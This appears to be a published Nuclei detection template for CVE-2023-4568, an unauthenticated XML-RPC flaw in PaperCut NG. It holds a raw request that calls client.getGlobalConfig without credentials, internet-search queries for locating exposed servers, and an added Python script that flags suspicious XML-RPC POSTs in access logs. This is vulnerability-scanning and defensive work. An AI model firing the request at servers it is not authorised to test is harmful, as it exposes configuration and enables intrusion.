PaperCut NG Unauthenticated XMLRPC Functionality
ID: CVE-2023-4568
Severity: medium
Author: DhiyaneshDK
Tags: cve2023,cve,unauth,papercut
Description
PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor-supplied patch.
YAML Source
```yaml
id: CVE-2023-4568

info:
  name: PaperCut NG Unauthenticated XMLRPC Functionality
  author: DhiyaneshDK
  severity: medium
  description: |
    PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.
  impact: |
    Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4568
    - https://www.tenable.com/security/research/tra-2023-31
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-4568
    cwe-id: CWE-287
    epss-score: 0.02217
    epss-percentile: 0.89475
    cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: papercut
    product: papercut_ng
    shodan-query:
      - html:"content=\"PaperCut\""
      - http.html:'content="papercut'
      - cpe:"cpe:2.3:a:papercut:papercut_ng"
      - http.html:"content=\"papercut\""
    fofa-query:
      - body='content="papercut'
      - body="content=\"papercut\""
    google-query: html:'content="papercut'
  tags: cve2023,cve,unauth,papercut

http:
  - raw:
      - |
        POST /rpc/clients/xmlrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type:text/xml

        <?xml version="1.0"?><methodCall><methodName>client.getGlobalConfig</methodName><params><param><value><string>str1</string></value></param><param><value><string>str2</string></value></param></params></methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'conf.ssl-port'
          - 'conf.auth-ttl-default'
        condition: and

      - type: word
        part: header
        words:
          - text/xml

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100953f6b2638c03dcb591858d7beeb6affded821cd568a20a30345753232584a6a022100fd292c8e4f4c0d9e391e3c8c5207fd65e2cac6ff336d59f3ddde41120f9cf57d:922c64590222798bb761d5b6d8e72950
```
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-4568.yaml"
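A defender-side check to pair with the template, added here as an example and not part of the template or the Nuclei project: it scans reverse-proxy access logs for POSTs to the `/rpc/clients/xmlrpc` endpoint that were answered with 200 and came from sources outside the networks where PaperCut clients are expected. The combined log format, the `ALLOWED_NETS` range and the sample log lines are assumptions constructed for the illustration.

```python
import ipaddress
import re
from collections import Counter

# Assumption: PaperCut sits behind a reverse proxy writing combined-format access logs.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
XMLRPC_PATH = "/rpc/clients/xmlrpc"  # endpoint taken from the template's request

# Assumption: networks where legitimate PaperCut clients live (hypothetical value).
ALLOWED_NETS = [ipaddress.ip_network("10.20.0.0/16")]

# Constructed sample log lines (documentation address ranges), not real traffic.
SAMPLE_LOG = """\
10.20.4.17 - - [12/Sep/2023:09:14:02 +0000] "POST /rpc/clients/xmlrpc HTTP/1.1" 200 812 "-" "client"
203.0.113.45 - - [12/Sep/2023:09:14:40 +0000] "POST /rpc/clients/xmlrpc HTTP/1.1" 200 5120 "-" "-"
203.0.113.45 - - [12/Sep/2023:09:14:41 +0000] "POST /rpc/clients/xmlrpc?x=1 HTTP/1.1" 200 5120 "-" "-"
198.51.100.9 - - [12/Sep/2023:09:15:10 +0000] "GET /app?service=page/Home HTTP/1.1" 200 2048 "-" "-"
198.51.100.9 - - [12/Sep/2023:09:15:12 +0000] "POST /rpc/clients/xmlrpc HTTP/1.1" 403 0 "-" "-"
not a log line
"""

def is_allowed(src):
    """True only when src is an IP address inside an allowlisted network."""
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return False  # hostname or garbage in the source field: treat as unknown
    return any(addr in net for net in ALLOWED_NETS)

def external_xmlrpc_hits(log_text):
    """Count answered (200) POSTs to the XML-RPC endpoint per non-allowlisted source."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0].rstrip("/")  # ignore query string
        if path != XMLRPC_PATH or m["status"] != "200":
            continue  # the template also keys on a 200 response
        if not is_allowed(m["src"]):
            hits[m["src"]] += 1
    return dict(hits)

if __name__ == "__main__":
    for src, count in sorted(external_xmlrpc_hits(SAMPLE_LOG).items()):
        print(f"ALERT {src}: {count} XML-RPC POST(s) answered with 200")
```

Access logs do not record the XML-RPC method name, so a hit here is a lead for review rather than proof that `client.getGlobalConfig` was called.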